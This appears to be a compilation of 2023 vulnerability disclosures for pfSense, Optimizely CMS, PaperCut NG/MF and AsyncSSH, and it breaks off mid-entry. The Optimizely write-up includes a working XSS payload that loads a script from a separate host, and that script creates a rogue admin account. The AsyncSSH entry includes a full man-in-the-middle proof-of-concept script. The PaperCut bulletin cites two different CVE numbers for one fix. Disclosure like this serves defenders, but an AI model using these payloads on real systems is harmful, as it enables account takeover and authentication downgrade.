An issue in Netgate pfSense v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the interfaces_gif_edit.php and interfaces_gre_edit.php components.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= pfSense-SA-23\_10.webgui Security Advisory pfSense Topic: Authenticated Command Execution in the WebGUI Category: pfSense Base System Module: webgui Announced: 2023-10-31 Credits: Oskar Zeino-Mahmalat (Sonar) CVE ID: CVE-2023-42326 Affects: pfSense Plus software versions <= 23.05.1 pfSense CE software versions <= 2.7.0 Corrected: 2023-07-05 19:31:30 UTC (pfSense Plus master, 23.09) 2023-07-05 19:31:30 UTC (pfSense CE master, 2.8.0) 0. Revision History v1.0 2023-10-31 Initial SA draft I. Background pfSense® software is a free network firewall distribution based on the FreeBSD operating system. The pfSense software distribution includes third- party free software packages for additional functionality, and provides most of the functionality of common commercial firewalls. pfSense® Plus is the productized version of pfSense software from Netgate®, previously referred to as pfSense Factory Edition (FE). It is available to Netgate appliance and CSP customers. The majority of users of pfSense software have never installed or used a stock FreeBSD system. Unlike similar GNU/Linux-based firewall distributions, there is no need for any UNIX knowledge. The command line is never used, and there is no need to ever manually edit any rule sets. Instead, pfSense software includes a web interface for the configuration of all included components. Users familiar with commercial firewalls will quickly understand the web interface, while those unfamiliar with commercial-grade firewalls may encounter a short learning curve. II. Problem Description A potential authenticated arbitrary command execution vulnerability was found in interfaces\_gif\_edit.php and interfaces\_gre\_edit.php, components of the pfSense Plus and pfSense CE software GUI. When creating or editing a GIF interface on interfaces\_gif\_edit.php or a GRE interface on interfaces\_gre\_edit.php, the submitted POST "gifif" or "greif" value is not validated. Subsequently, the value is passed to another function where the submitted value is used in shell commands. This problem is present on pfSense Plus version 23.05.1, pfSense CE version 2.7.0, and earlier versions of both. III. Impact Due to a lack of escaping on commands in the functions being called, it is possible to execute arbitrary commands with a properly formatted submission value for "gifif" or "greif" in POST operations. The user must be logged in and have sufficient privileges to access either interfaces\_gif\_edit.php or interfaces\_gre\_edit.php. IV. Workaround To help mitigate the problem on older releases, use one or more of the following: \* Limit access to the affected pages to trusted administrators only. \* Do not log into the firewall with the same browser used for non- administrative web browsing. V. Solution Users can upgrade to pfSense Plus software version 23.09 or later, or a pfSense CE software version after 2.7.0, when one is available. This upgrade may be performed in the web interface or from the console. See https://docs.netgate.com/pfsense/en/latest/install/upgrade-guide.html Users on pfSense Plus version 23.05.1 and pfSense CE version 2.7.0 may apply the fix from the recommended patches list in the System Patches package. Users may also manually apply the relevant revisions below using the System Patches package on earlier versions, or by manually making similar changes to the affected files if the patches do not apply directly. See https://docs.netgate.com/pfsense/en/latest/development/system-patches.html VI. Correction details The following list contains the correction revision commit ID for each affected item. Branch/path Revision - - ------------------------------------------------------------------------- plus/plus-master d69d6c8424ab4299234fb5ec6964682e2e6cbcdd pfSense/master d69d6c8424ab4299234fb5ec6964682e2e6cbcdd - - ------------------------------------------------------------------------- VII. References The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE40XvjEU56XSUPIMdE7mH/ZIU+NoFAmU/wRgACgkQE7mH/ZIU +NpQWQ/+N55UGKjB+ZFEtXRV/d9Pl66TII2D28U8+v4iGNlcmo6jTC2mofYaQ77C dybvlyXM86lH1dDnzzv6uuEIjtSWyN0aM37ndfGDR7CxB5sgUXLkl+jeIdqZXqA2 IJgAdw59GCkeGttw9bCoIs7ZADlpx5/n37LMztxMHfgmw4KknEiBy1PF1YDIh4iD mwhqQLqDlhzcWOcqEAtECgpSoaIYd5Yd3/pNPtIsYhDg4QxSOCT6KGQuU/msTVru OmUE+qbjaFKu7oUKNdYtdpC4jgZ44SJLLNikLLyoxpcb/IqBOjqIDCXfq1Du8gJG 5QROPevZOfXbgFSKHF3zJlqcCFAVt4iAuazXFWjyHksU9jjMfxYvRvRxqqAJCXsF W3z3ib+sSjlooNSN/KOdQNQvmBlN1epWfhHWgNnoQQBS5S75nyomgbu/7Gbo+GWY y66zYDS1LtBKC+OjnypiUaI46IhqV3474dhPn13E5GqoeQxaT+YI5Zan8EZEVqkT 3TDTdjMfha9zXv/pEEHaoE9vZ+GDwtsNFxQN0CPTdAsyLpkpiKfjfBz1Vxo8UJyr t+iRNSg8VIe8n0jkd8ekb8GVbgY4WVeyVyz+qlGKPKmXdlVTt17vsMJu9jB/gmeU tl4ZZCrR5UVujekUqg0x1//UcdjTUkF7RMDU92k0whQftWOmaCA= =5TPU -----END PGP SIGNATURE-----

CVE-2023-42326

Optimizely CMS UI before v12.16.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Admin panel.

**Description**

The Optimizely admin interface was vulnerable to DOM-based cross-site scripting (XSS), which could allow an attacker to execute malicious Javascript code in a legitimate user's browser. 

Optimizely CMS is a widely used content management system that allows users to create and manage digital content. The CMS was previously called Episerver.

**Impact**

WithSecure weaponized the XSS to automatically create an attacker-controlled admin user in Optimizely as a proof of concept. This could be used in conjunction with, for example, phishing to take control of Optimizely instances.

**Proof of concept**

The Optimizely admin panel utilized JavaScript to fetch and display content. The frontend looked at the content in the URL fragment and attempted to fetch the requested content. If the fetch failed, such as when the content did not exist, a dialogue would be displayed with an error message. The way this error message was displayed to the user left the application vulnerable to XSS. An example error can be viewed in the  screenshot below:

The error message is displayed to the user by setting the innerHTML attribute on an element with the message content. The attacker-controlled input in this message is not sanitized or validated before the assignment. This allows an attacker to control the HTML content of the element. As an example, by visiting the following URL:

http://172.20.0.3/EPiServer/CMS/#context=epi.cms.contentdata:///%3Cimg%20src=x%20onerror=alert(%22xss%22)%3E

An alert popup in the user's browser (provided they are signed in to Optimizely) will be displayed, indicating that it is possible to execute arbitrary JavaScript:

Below is a debugging session where the attacker-controlled input reaches the vulnerable sink in widgets.js:

In the above screenshot, the contents of the variable _**\_5c1**_ is printed in the browser console. The content is an error message meant to be displayed to the user, saying that the requested URL could not be loaded followed by the attacker provided data. 

WithSecure weaponized the XSS to automatically add a new admin user to Optimizely when a link was clicked:

http://172.20.0.3/EPiServer/cms#context=epi.cms.contentdata:///%3Cimg%20src=x%20onerror=%22document.write('%3Cscript%20src=\\'http://192.168.84.168:8000/exploit.js\\'%3E%3C/script%3E')%22%3E

The URL-decoded payload can be viewed below:

<img src=x onerror="document.write('<script src=\\'http://192.168.84.168:8000/exploit.js\\'></script>')">

Since the user provided input reaches an innerHTML sink, regular  <script> tags cannot be used to execute Javascript. Instead, an image tag with an  onerror attribute is used to write a script tag to the DOM. The browser would then load  additional attacker-controlled Javascript from  http://192.168.84.168:8000/exploit.js. In a real-world scenario, this would be a host on the Internet instead of an internal host. The contents of exploit.js:

fetch('http://172.20.0.3/EPiServer/EPiServer.Cms.UI.Admin/default', { 'credentials': 'include' }).then(response => response.text()).then(data => data.match(/value="(.\*)\\"/)\[1\]).then(token => { json={"username":"hacker","email":"hacker@hack.hack","isChangePassword":true,"password":"Password1!","confirmPassword":"Password1!","currentPassword":"","passwordAnswer":"","language":null,"touchSupport":false,"headlessModeEnabled":false,"roles":\["WebAdmins"\],"isApproved":true,"isLockedOut":false};fetch('http://172.20.0.3/EPiServer/EPiServer.Cms.UI.Admin/users/Create',{'credentials':'include','body':JSON.stringify(json),'method':'POST',headers:{'Content-Type':'application/json','RequestVerificationToken':token}})})

The above script adds a user called hacker with a pre-set password as a web admin in Optimizely. An attacker would need to trick a user into clicking a malicious link that triggers the XSS vulnerability, and if the user is signed in to Optimizely, an attacker-controlled admin account would be created. The attacker can subsequently sign in to Optimizely using the account.

CVE-2023-31754: Optimizely CMS Admin Panel DOM XSS

This vulnerability allows local attackers to escalate privileges on affected installations of PaperCut NG. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
The specific flaw exists within the pc-pdl-to-image process. The process loads an executable from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.

**AVAILABLE TO CUSTOMERS ON:**

   

**Security Issues Addressed****Privilege escalation vulnerability (CVE-2023-6006)**

(also known as PIE-547).

We want to thank the security researchers at Trend Micro (Amol Dosanjh of Trend Micro and Michael DePlante of Trend Micro Zero Day Initiative) who reported: “This vulnerability allows local attackers to escalate privileges on affected installations of PaperCut NG. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.”

A potential exploit would require **all** of the following to be true:

*   PaperCut NG/MF Application Server (earlier than version 23.0.1) is running on a Windows platform (macOS and Linux are not impacted by this vulnerability).
*   Malicious actor has write access to the Application Server’s local hard drive.
*   Malicious actor has the ability to execute low-privileged code on the target server.
*   Print Archiving feature is enabled, _without_ GhostTrap installed.

This vulnerability has been rated with a CVSS score of **6.4**: (CVSSv3 Vector: AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H )

Note: Trend Micro are looking to publicly disclose additional information about this. While the Trend Micro advisory may only mention PaperCut NG, we have confirmed that this impacts both PaperCut NG and PaperCut MF (see Impacted Product Status table below).

**A note about the timing of this bulletin**

We publicly released PaperCut MF and NG version 23.0.1 on 31st October, 2023. This security bulletin and information about CVE-2023-6006 was then published on 14th November 2023. This delay was so that customers can have a head-start on upgrading to a non-vulnerable version.

We have now retroactively added the release note for PIE-547 into the 23.0.1 release notes , and published this security bulletin including details of the manual mitigation.

**Impacted Product Status**

 

**CVE-2023-6006**  
_(Fix ID: PIE-547)_

What versions are **VULNERABLE**?

PaperCut NG/MF Application Servers where all of the following are true:

*   PaperCut NG/MF Application Server (earlier than version 23.0.1) is running on a Windows platform (macOS and Linux are not impacted by this vulnerability).
*   Malicious actor has write access to the Application Server’s local hard drive.
*   Malicious actor has the ability to execute low-privileged code on the target server.
*   Print Archiving feature is enabled, _without_ GhostTrap installed.
    

What versions are **FIXED**?

Application Servers running version 23.0.1 or later

Which PaperCut MF or NG components **are** impacted?

Application Servers **are** impacted.

Which PaperCut components or products are **NOT** impacted?

*   PaperCut NG/MF site servers
*   PaperCut NG/MF secondary servers (Print Providers)
*   PaperCut NG/MF Direct Print Monitors (Print Providers)
*   PaperCut MF MFD Embedded Software
*   PaperCut Hive
*   PaperCut Pocket
*   Print Deploy
*   Mobility Print
*   PaperCut User Client software
*   PaperCut Multiverse
*   Print Logger
*   Job Ticketing

  
Note that this only impacts Application Servers running on Windows platforms. Linux or macOS platforms are **not** impacted.

Are there any other **mitigations** available?

Yes. If you’re unable to immediately update to 23.0.1 or later, there are other mitigation options listed below under How do I mitigate this vulnerability?

**FAQs**

Q Where can I get the upgrade?

The **Check for updates** button in the PaperCut NG/MF admin interface allows customers to download the latest version of PaperCut NG or MF. You will find this at **PaperCut NG/MF Admin interface > About > Version info > Check for updates**.

You can also find your PaperCut partner or reseller information on the Help tab (or About tab in older versions) on the PaperCut Web admin interface.

Alternatively, direct downloads are available on the upgrade page . It’s easy to identify your edition of PaperCut - it’s on the **About** tab and in the footer of your PaperCut Web admin login.

Q How do I tell if my Application Server is at risk?

**All** of the following need to be true for your Application Server to be at risk:

*   PaperCut NG/MF Application Server (earlier than version 23.0.1) is running on a Windows platform (macOS and Linux are not impacted by this vulnerability).
*   Malicious actor has write access to the Application Server’s local hard drive.
*   Malicious actor has the ability to execute low-privileged code on the target server.
*   Print Archiving feature is enabled, _without_ GhostTrap installed.

Q How do I tell if I am using the Print Archiving feature?

In the PaperCut NG/MF admin interface, go to **Options > General > Print Archiving**.

*   If the **Enable Print Archiving** checkbox is _not_ checked, then you are not using Print Archiving, and this vulnerability cannot be exploited.
*   If the **Enable Print Archiving** checkbox _is_ checked, then you are using Print Archiving and the vulnerability could potentially be exploited if all of the other points above in “How do I tell if my Application Server is at risk” are true.

Q If I am using Print Archiving, how do I tell if I have installed GhostTrap?

In the PaperCut NG/MF admin interface, go to **Options > General > Print Archiving**. In the Status box, check to see what is listed next to the **Viewing supported** for line:

*   If **Viewing supported for** lists e.g. EMF, PCL5, PCL6, PDF, PostScript, XPS then GhostTrap is installed, and this vulnerability cannot be exploited.
*   If **Viewing supported for** only lists e.g. PDF, PostScript then GhostTrap is not installed, and this vulnerability could be exploited, if all of the other points above in How do I tell if my Application Server is at risk? are true.

Q How do I mitigate this vulnerability?

If all of the points under How do I tell if my Application Server is at risk? are true, there are several options to mitigate this vulnerability:

1.  Upgrade your Application Server to version 23.0.1 or later (see Where can I get the upgrade? above).
    
2.  If you’re unable to upgrade to version 23.0.1 or later, and turning off Print Archiving is an option, you can switch that off under **Options > General > Print Archiving**, then uncheck **Enable Print Archiving**.
    
3.  If you’re unable to upgrade to version 23.0.1 or later, and you need to continue using Print Archiving, then ensure ghostTrap is installed in C:\Program Files\GhostTrap. See Set up Print Archiving (Step 1) for more information.
    
4.  If you’re unable to upgrade to version 23.0.1 or later, and you need to continue using Print Archiving, and you don’t want to install GhostTrap, then you can create a directory on your Application Server file system: C:\gs\bin and remove **write permissions** for all accounts except administrators.
    
5.  If none of the above suit your environment, you can download a fixed version of the pc-pdl-to-image.exe and replace it on your Application Server. See How do I manually replace the pc-pdl-to-image.exe binary? below for more information.
    

Q How do I manually replace the pc-pdl-to-image.exe binary?

**Only** use this fix if you have looked through the section How do I mitigate this vulnerability above, and Option 5 is the only option you’re able to implement.

**Note**: if you are using PaperCut NG or MF version 23.0.1 or later, you do **not** need to perform these steps - you already have the latest patched version.

1.  Download the updated (patched) pc-pdl-to-image.exe binary from the PaperCut CDN: https://cdn.papercut.com/files/general/pc-pdl-to-image.zip .
    
2.  Unzip pc-pdl-to-image.zip to get the pc-pdl-to-image.exe binary. (If you wish to verify the SHA256 checksum this is: 5be6a8a817a3fc30fb4a56bff527b51a452d8d84ae1d3d5632d83d2674bcbbb6).
    
3.  In [App Server install directory]\server\bin\win (e.g. C:\\Program Files\\PaperCut MF\\server\\bin\\win) rename pc-pdl-to-image.exe to pc-pdl-to-image.bak
    
4.  Copy the downloaded (patched) pc-pdl-to-image.exe to [App Server install directory]\server\bin\win\.
    

_Note 1_: A service restart is **not** required for this change to take effect.

_Note 2_: If you subsequently upgrade to any other version earlier than 23.0.1 (e.g. if you apply this mitigation on 22.1.3, then you upgrade from 22.1.3 to 22.1.4) you will need to re-apply this mitigation - since the replaced binary will be re-written with an unpatched one.

_Note 3_: If you are upgrading to 23.0.1 or later, you will **not** need to apply this manual mitigation since the fix is included in 23.0.1 and later.

_Note 4_: The full list of fixes for the patched executable include:

*   Fix for CVE-2023-39471 (the vulnerability described above) \[PIE-547\] (fixed in PaperCut NG and MF version 23.0.1).
*   Fix for an issue that caused thumbnail image generation to fail for archived PostScript spool files. \[PIE-216\] (fixed in PaperCut NG and MF version 22.0.9).

Q What products are impacted by these vulnerabilities?

See the Impacted Product Status section above for a detailed list.

Q I am running a 20.x, 21.x or 22.x version - is there an updated build containing the fix?

No - since this vulnerability can be mitigated using multiple options (see How do I mitigate this vulnerability? above) this fix will only be included in 23.0.1 and later.

Q Is there anything I should be aware of before applying the upgrade?

Yes, potentially. If you are upgrading from a version prior to 22.1.1 you should read the upgrade checklist for 22.1.1 . If you’re already on version 22.1.1 or later, you don’t need to check through this again.

Q I am running an old version. Do I need to upgrade to a prior version before upgrading to 23.0.1?

No. This release includes all previous fixes released, and you can upgrade directly to this release from any previous version of PaperCut NG/MF.

**Security notifications**

“How do I sign-up for paperCut’s security mailing list?”

In order to get timely notifications of security news (including security related fixes or vulnerability information) please subscribe to our security notifications list via our Security notifications sign-up form. If you’re a sys admin or if you look after PaperCut product implementations at your organization, this list will help you be amongst the first to hear of any security related news or updates.

**Updates**

**Date**

**Update/Action**

31st October, 2023 (AEDT)

Publicly released PaperCut NG/MF version 23.0.1 (contains vulnerability fixes identified above).

14th November, 2023 (AEDT)

Published this Security bulletin.

14th November, 2023 (AEDT)

Published CVE-2023-6006.

CVE-2023-6006: PaperCut NG/MF Security Bulletin (November 2023)

Cross Site Scripting (XSS) vulnerability in Netgate pfSense v.2.7.0 allows a remote attacker to gain privileges via a crafted url to the status_logs_filter_dynamic.php page.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= pfSense-SA-23\_09.webgui Security Advisory pfSense Topic: XSS vulnerability in the WebGUI Category: pfSense Base System Module: webgui Announced: 2023-10-31 Credits: Oskar Zeino-Mahmalat (Sonar) CVE ID: CVE-2023-42325 Affects: pfSense Plus software versions <= 23.05.1 pfSense CE software versions <= 2.7.0 Corrected: 2023-07-05 18:51:06 UTC (pfSense Plus master, 23.09) 2023-07-05 18:51:06 UTC (pfSense CE master, 2.8.0) 0. Revision History v1.0 2023-10-31 Initial SA draft I. Background pfSense® software is a free network firewall distribution based on the FreeBSD operating system. The pfSense software distribution includes third- party free software packages for additional functionality, and provides most of the functionality of common commercial firewalls. pfSense® Plus is the productized version of pfSense software from Netgate®, previously referred to as pfSense Factory Edition (FE). It is available to Netgate appliance and CSP customers. The majority of users of pfSense software have never installed or used a stock FreeBSD system. Unlike similar GNU/Linux-based firewall distributions, there is no need for any UNIX knowledge. The command line is never used, and there is no need to ever manually edit any rule sets. Instead, pfSense software includes a web interface for the configuration of all included components. Users familiar with commercial firewalls will quickly understand the web interface, while those unfamiliar with commercial-grade firewalls may encounter a short learning curve. II. Problem Description A potential Cross-Site Scripting (XSS) vulnerability was found in status\_logs\_filter\_dynamic.php, a component of the pfSense Plus and pfSense CE software GUI. The page does not always validate or sanitize the value of the "interface" variable from user input when using RAW mode ("filtersubmit=1"), which then may be printed without encoding inside a block of JavaScript code. This problem is present on pfSense Plus version 23.05.1, pfSense CE version 2.7.0, and earlier versions of both. III. Impact Due to the lack of proper encoding on the affected parameters susceptible to XSS, arbitrary JavaScript could be executed in the user's browser. The user's session cookie or other information from the session may be compromised. The user must be logged in and have sufficient privileges to access status\_logs\_filter\_dynamic.php. IV. Workaround To help mitigate the problem on older releases, use one or more of the following: \* Limit access to the affected pages to trusted administrators only. \* Do not log into the firewall with the same browser used for non- administrative web browsing. V. Solution Users can upgrade to pfSense Plus software version 23.09 or later, or a pfSense CE software version after 2.7.0, when one is available. This upgrade may be performed in the web interface or from the console. See https://docs.netgate.com/pfsense/en/latest/install/upgrade-guide.html Users on pfSense Plus version 23.05.1 and pfSense CE version 2.7.0 may apply the fix from the recommended patches list in the System Patches package. Users may also manually apply the relevant revisions below using the System Patches package on earlier versions, or by manually making similar changes to the affected files if the patches do not apply directly. See https://docs.netgate.com/pfsense/en/latest/development/system-patches.html VI. Correction details The following list contains the correction revision commit ID for each affected item. Branch/path Revision - - ------------------------------------------------------------------------- plus/plus-master f387c974a9a597bf01ab86ec049cca186a1e050c pfSense/master f387c974a9a597bf01ab86ec049cca186a1e050c - - ------------------------------------------------------------------------- VII. References The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE40XvjEU56XSUPIMdE7mH/ZIU+NoFAmU/wRcACgkQE7mH/ZIU +NotvRAAobKxH11HjFKUNdAUA6rqv9BcRqgYWNVTVQSDM/Wmf4lw2mAvldMaaSOc KodEYJ6LWf1kZGu7VN36q59l7gn9/H42PeBNU7cNDJZaNXZd3LUG2bqRn4f8AuJA jUvPzE3w7DHcxrgHIn/3S8WI5WSVDgemzL4d6HlbzJtJ1mdF1viWkJZY6EqKRPgR Mw1adsPZyiAf7AalNRA7IJjPYTyUMxC2YSiMz2goeWd+6Zfkul9sbciTXCQwFAXO ZelZZm+arYtutXpeCJPmX3SvVcaT+f87anql20Xlijkuexr8aoMuSHOX8MYWMapY ndoNZZusoq2pUSK4VAPnhBIqtD6M7izC+bcWUBRea3h3/IiXjhPDtUtr4ONZQ3fQ HGf8ZEHd2EswpNhYbKz5cdMm37Q3JhRzVYMXFvNjsjOliF0ZyEibnO5L7W51Jujk yRu5fIli6UlfhcLD2iTOdnDnxSzxl4QiBAD0/XMVl3OQoy1R4AoFS9VtGi+EteB9 SykmgjmgIBjxSQvEyt30olt9XbVvDbi1EQDmJz6hd14P1Sy03BMn1BZoU5heN9Xc t3gdQMS01rB+EqGenXDnKvIKQ3LAb1AqNvYzn1BSrMno6YGCgSVEKw6vPEbEoI7r AX6MEZeetdwzHIEws9UEp8XYt6Q1hSmnNCJU8pfpAsuaum3SGo0= =W5mP -----END PGP SIGNATURE-----

CVE-2023-42325

Cross Site Scripting (XSS) vulnerability in Netgate pfSense v.2.7.0 allows a remote attacker to gain privileges via a crafted URL to the getserviceproviders.php page.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= pfSense-SA-23\_08.webgui Security Advisory pfSense Topic: XSS vulnerability in the WebGUI Category: pfSense Base System Module: webgui Announced: 2023-10-31 Credits: Oskar Zeino-Mahmalat (Sonar) CVE ID: CVE-2023-42327 Affects: pfSense Plus software versions <= 23.05.1 pfSense CE software versions <= 2.7.0 Corrected: 2023-07-05 17:43:56 UTC (pfSense Plus master, 23.09) 2023-07-05 17:43:56 UTC (pfSense CE master, 2.8.0) 0. Revision History v1.0 2023-10-31 Initial SA draft I. Background pfSense® software is a free network firewall distribution based on the FreeBSD operating system. The pfSense software distribution includes third- party free software packages for additional functionality, and provides most of the functionality of common commercial firewalls. pfSense® Plus is the productized version of pfSense software from Netgate®, previously referred to as pfSense Factory Edition (FE). It is available to Netgate appliance and CSP customers. The majority of users of pfSense software have never installed or used a stock FreeBSD system. Unlike similar GNU/Linux-based firewall distributions, there is no need for any UNIX knowledge. The command line is never used, and there is no need to ever manually edit any rule sets. Instead, pfSense software includes a web interface for the configuration of all included components. Users familiar with commercial firewalls will quickly understand the web interface, while those unfamiliar with commercial-grade firewalls may encounter a short learning curve. II. Problem Description A potential Cross-Site Scripting (XSS) vulnerability was found in getserviceproviders.php, a component of the pfSense Plus and pfSense CE software GUI. The page does not always validate or sanitize the value of the "connection" variable from user input, which then may be displayed without encoding. This problem is present on pfSense Plus version 23.05.1, pfSense CE version 2.7.0, and earlier versions of both. III. Impact Due to the lack of proper encoding on the affected parameters susceptible to XSS, arbitrary JavaScript could be executed in the user's browser. The user's session cookie or other information from the session may be compromised. The user must be logged in and have sufficient privileges to access getserviceproviders.php. The affected case requires a provider to only have one plan. IV. Workaround To help mitigate the problem on older releases, use one or more of the following: \* Limit access to the affected pages to trusted administrators only. \* Do not log into the firewall with the same browser used for non- administrative web browsing. V. Solution Users can upgrade to pfSense Plus software version 23.09 or later, or a pfSense CE software version after 2.7.0, when one is available. This upgrade may be performed in the web interface or from the console. See https://docs.netgate.com/pfsense/en/latest/install/upgrade-guide.html Users on pfSense Plus version 23.05.1 and pfSense CE version 2.7.0 may apply the fix from the recommended patches list in the System Patches package. Users may also manually apply the relevant revisions below using the System Patches package on earlier versions, or by manually making similar changes to the affected files if the patches do not apply directly. See https://docs.netgate.com/pfsense/en/latest/development/system-patches.html VI. Correction details The following list contains the correction revision commit ID for each affected item. Branch/path Revision - - ------------------------------------------------------------------------- plus/plus-master 543dc9253d6ab0e755ee043da2217d996a28ab5e pfSense/master 543dc9253d6ab0e755ee043da2217d996a28ab5e - - ------------------------------------------------------------------------- VII. References The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE40XvjEU56XSUPIMdE7mH/ZIU+NoFAmU/wPoACgkQE7mH/ZIU +Nq8KA//YY1io7ZIDo//w4I3v+j25c83Yx40K20I+Zal8cyPflwqG6fF/DJRCEfv R0CWRZP6aPEfxVsWfLhoDktEm6yNcn0WR6MSVTbKOnyfJfb7Dp/tznkzZhSUqQ7v rt0bBMSdoQTn6gZIAD7TLVCmh9RfcYAXDWGiHUNC5d6kvy8Eoe7/+cjZUOSbvg/a EV0EgKqZoWFkwZWWLrbtNKyMBpIA1sgUKeVAPwnFMJ20QRPrafdNJircOU0S0vR5 1zAs6JMKgARL5ytzPxlndtKtwe1sVmxkYeGUb6C7b6mLnPckCFMGaAZYYnrK2V3f YbqK66/ZURgdmGcLAy305/oNwZy3JmpVS2FNgS3ZrBlwYXlYnxFkrEzi4SMFNtVP RltNabwM75bq/9tWqDm/nitHwmEgkm3wKdtXue2TGfNEulsmb+TeH7hGXJzuxStm 0lx+oQDmLL9jToPx4aHWMSXSCJe3wKk4uxpe6TTD9hnOB+TEln4sjmS5/MDlAYP8 zh8vkwKUag3gIPulsnmRFNrIPw49ezoWg4ZdVzadpw7zwS6Iar/oK4xEVIb6abWz kYAmB85iOuvqeZzVbiRNl8bb06h/ci9hXmsInuWwV8BfXtR1bl/xJ2n0j1AXnQPW yn27vmU9UmFodHjNfRATNzNGVL4vZoXDnvaeDMgRBwa5Dobslig= =9dZ6 -----END PGP SIGNATURE-----

CVE-2023-42327

An issue in AsyncSSH v2.14.0 and earlier allows attackers to control the extension info message (RFC 8308) via a man-in-the-middle attack.

**Summary**

An issue in AsyncSSH v2.14.0 and earlier allows attackers to control the extension info message (RFC 8308) via a man-in-the-middle attack.

**Details**

The rogue extension negotiation attack targets an AsyncSSH client connecting to any SSH server sending an extension info message. The attack exploits an implementation flaw in the AsyncSSH implementation to inject an extension info message chosen by the attacker and delete the original extension info message, effectively replacing it.

A correct SSH implementation should not process an unauthenticated extension info message. However, the injected message is accepted due to flaws in AsyncSSH. AsyncSSH supports the server-sig-algs and global-requests-ok extensions. Hence, the attacker can downgrade the algorithm used for client authentication by meddling with the value of server-sig-algs (e.g. use of SHA-1 instead of SHA-2).

**PoC**AsyncSSH Client 2.14.0 (simple\_client.py example) connecting to AsyncSSH Server 2.14.0 (simple\_server.py example)

 #!/usr/bin/python3
 import socket
 from threading import Thread
 from binascii import unhexlify
 
 #####################################################################################
 \## Proof of Concept for the rogue extension negotiation attack (ChaCha20-Poly1305) ##
 \##                                                                                 ##
 \## Client(s) tested: AsyncSSH 2.14.0 (simple\_client.py example)                    ##
 \## Server(s) tested: AsyncSSH 2.14.0 (simple\_server.py example)                    ##
 \##                                                                                 ##
 \## Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0    ##
 #####################################################################################
 
 \# IP and port for the TCP proxy to bind to
 PROXY\_IP \= '127.0.0.1'
 PROXY\_PORT \= 2222
 
 \# IP and port of the server
 SERVER\_IP \= '127.0.0.1'
 SERVER\_PORT \= 22
 
 \# Length of the individual messages
 NEW\_KEYS\_LENGTH \= 16
 SERVER\_EXT\_INFO\_LENGTH \= 676
 
 newkeys\_payload \= b'\\x00\\x00\\x00\\x0c\\x0a\\x15'
 def contains\_newkeys(data):
     return newkeys\_payload in data
 
 \# Empty EXT\_INFO here to keep things simple, but may also contain actual extensions like server-sig-algs
 rogue\_ext\_info \= unhexlify('0000000C060700000000000000000000')
 def insert\_rogue\_ext\_info(data):
     newkeys\_index \= data.index(newkeys\_payload)
     \# Insert rogue extension info and remove SSH\_MSG\_EXT\_INFO
     return data\[:newkeys\_index\] + rogue\_ext\_info + data\[newkeys\_index:newkeys\_index + NEW\_KEYS\_LENGTH\] + data\[newkeys\_index + NEW\_KEYS\_LENGTH + SERVER\_EXT\_INFO\_LENGTH:\]
 
 def forward\_client\_to\_server(client\_socket, server\_socket):
     try:
         while True:
             client\_data \= client\_socket.recv(4096)
             if len(client\_data) \== 0:
                 break
             server\_socket.send(client\_data)
     except ConnectionResetError:
         print("\[!\] Client connection has been reset. Continue closing sockets.")
     print("\[!\] forward\_client\_to\_server thread ran out of data, closing sockets!")
     client\_socket.close()
     server\_socket.close()
 
 def forward\_server\_to\_client(client\_socket, server\_socket):
     try:
         while True:
             server\_data \= server\_socket.recv(4096)
             if contains\_newkeys(server\_data):
                 print("\[+\] SSH\_MSG\_NEWKEYS sent by server identified!")
                 if len(server\_data) < NEW\_KEYS\_LENGTH + SERVER\_EXT\_INFO\_LENGTH:
                     print("\[+\] server\_data does not contain all messages sent by the server yet. Receiving additional bytes until we have 692 bytes buffered!")
                 while len(server\_data) < NEW\_KEYS\_LENGTH + SERVER\_EXT\_INFO\_LENGTH:
                     server\_data += server\_socket.recv(4096)
                 print(f"\[d\] Original server\_data before modification: {server\_data.hex()}")
                 server\_data \= insert\_rogue\_ext\_info(server\_data)
                 print(f"\[d\] Modified server\_data with rogue extension info: {server\_data.hex()}")
             if len(server\_data) \== 0:
                 break
             client\_socket.send(server\_data)
     except ConnectionResetError:
         print("\[!\] Target connection has been reset. Continue closing sockets.")
     print("\[!\] forward\_server\_to\_client thread ran out of data, closing sockets!")
     client\_socket.close()
     server\_socket.close()
 
 if \_\_name\_\_ \== '\_\_main\_\_':
     print("--- Proof of Concept for the rogue extension negotiation attack (ChaCha20-Poly1305) ---")
     mitm\_socket \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
     mitm\_socket.bind((PROXY\_IP, PROXY\_PORT))
     mitm\_socket.listen(5)
 
     print(f"\[+\] MitM Proxy started. Listening on {(PROXY\_IP, PROXY\_PORT)} for incoming connections...")
 
     try:
         while True:
             client\_socket, client\_addr \= mitm\_socket.accept()
             print(f"\[+\] Accepted connection from: {client\_addr}")
             print(f"\[+\] Establishing new server connection to {(SERVER\_IP, SERVER\_PORT)}.")
             server\_socket \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
             server\_socket.connect((SERVER\_IP, SERVER\_PORT))
             print("\[+\] Spawning new forwarding threads to handle client connection.")
             Thread(target\=forward\_client\_to\_server, args\=(client\_socket, server\_socket)).start()
             Thread(target\=forward\_server\_to\_client, args\=(client\_socket, server\_socket)).start()
     except KeyboardInterrupt:
         client\_socket.close()
         server\_socket.close()
         mitm\_socket.close()

**Impact**

Algorithm downgrade during user authentication.

CVE-2023-46445: Rogue Extension Negotiation in AsyncSSH

An issue in AsyncSSH v2.14.0 and earlier allows attackers to control the remote end of an SSH client session via packet injection/removal and shell emulation.

**Summary**

An issue in AsyncSSH v2.14.0 and earlier allows attackers to control the remote end of an SSH client session via packet injection/removal and shell emulation.

**Details**

